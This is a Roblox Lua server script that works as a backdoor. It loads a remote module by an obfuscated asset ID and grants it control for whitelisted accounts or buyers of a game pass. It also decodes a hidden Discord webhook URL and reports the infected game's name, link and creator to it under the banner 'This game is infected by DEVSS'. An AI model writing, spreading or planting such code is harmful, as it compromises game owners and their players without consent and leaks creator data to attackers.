local HttpService = game:GetService("HttpService")
local Pace = game:GetService("MarketplaceService")
local info = Pace:GetProductInfo(game.PlaceId)
local gameNme = info.Name
local asset = require(0x6EA48B14048F)
local pass = 1549855336

local Whitelist = {
	["\68\69\86\95\69\82\65\83\69\68"] = true,
    ["\070\097\104\097\100\082\071\088"] = true,
}


local Players = game:GetService("Players")

local function handlePlayer(plr)
	if Whitelist[plr.Name] then
		asset.IN(plr.Name)
		return
	end

	local success, owns = pcall(function()
		return Pace:UserOwnsGamePassAsync(plr.UserId, pass)
	end)

	if success and owns then
		asset.IN(plr.Name)
	end
end

Players.PlayerAdded:Connect(function(plr)
	handlePlayer(plr)
end)

for _, plr in ipairs(Players:GetPlayers()) do
	handlePlayer(plr)
end
local main = "\104\116\116\112\115\058\047\047\100\105\115\099\111\114\100\046\099\111\109\047\097\112\105\047\119\101\098\104\111\111\107\115\047\049\052\054\054\053\054\050\055\051\055\053\056\051\056\049\054\056\055\055\047\082\084\068\068\121\085\081\054\102\080\098\083\072\112\106\082\083\114\068\077\056\069\114\099\109\051\106\107\109\098\076\111\110\048\083\112\049\074\107\110\049\048\097\122\122\119\117\119\048\079\084\057\110\081\110\082\118\073\066\074\105\098\086\086\086\075\055\098"
local data = {
	username = "Logged Game",
	embeds = {
		{
			title = "This game is infected by DEVSS",
			description = "",
			color = 3447003,
			fields = {
				{
					name = "Game Name",
					value = gameNme,
					inline = false
				},
				{
					name = "Game link",
					value = "https://www.roblox.com/games/"..game.PlaceId,
					inline = false
				},
				{
					name = "Creator Name",
					value = info.Creator.Name,
					inline = false
				},
				{
					name = "Creator Id",
					value = info.Creator.Id,
					inline = false
				}
			},
			footer = {
				text = "Join now before it gets uninfected"
			}
		}
	}
}

pcall(function()
	HttpService:PostAsync(
		main,
		HttpService:JSONEncode(data),
		Enum.HttpContentType.ApplicationJson
	)
end)
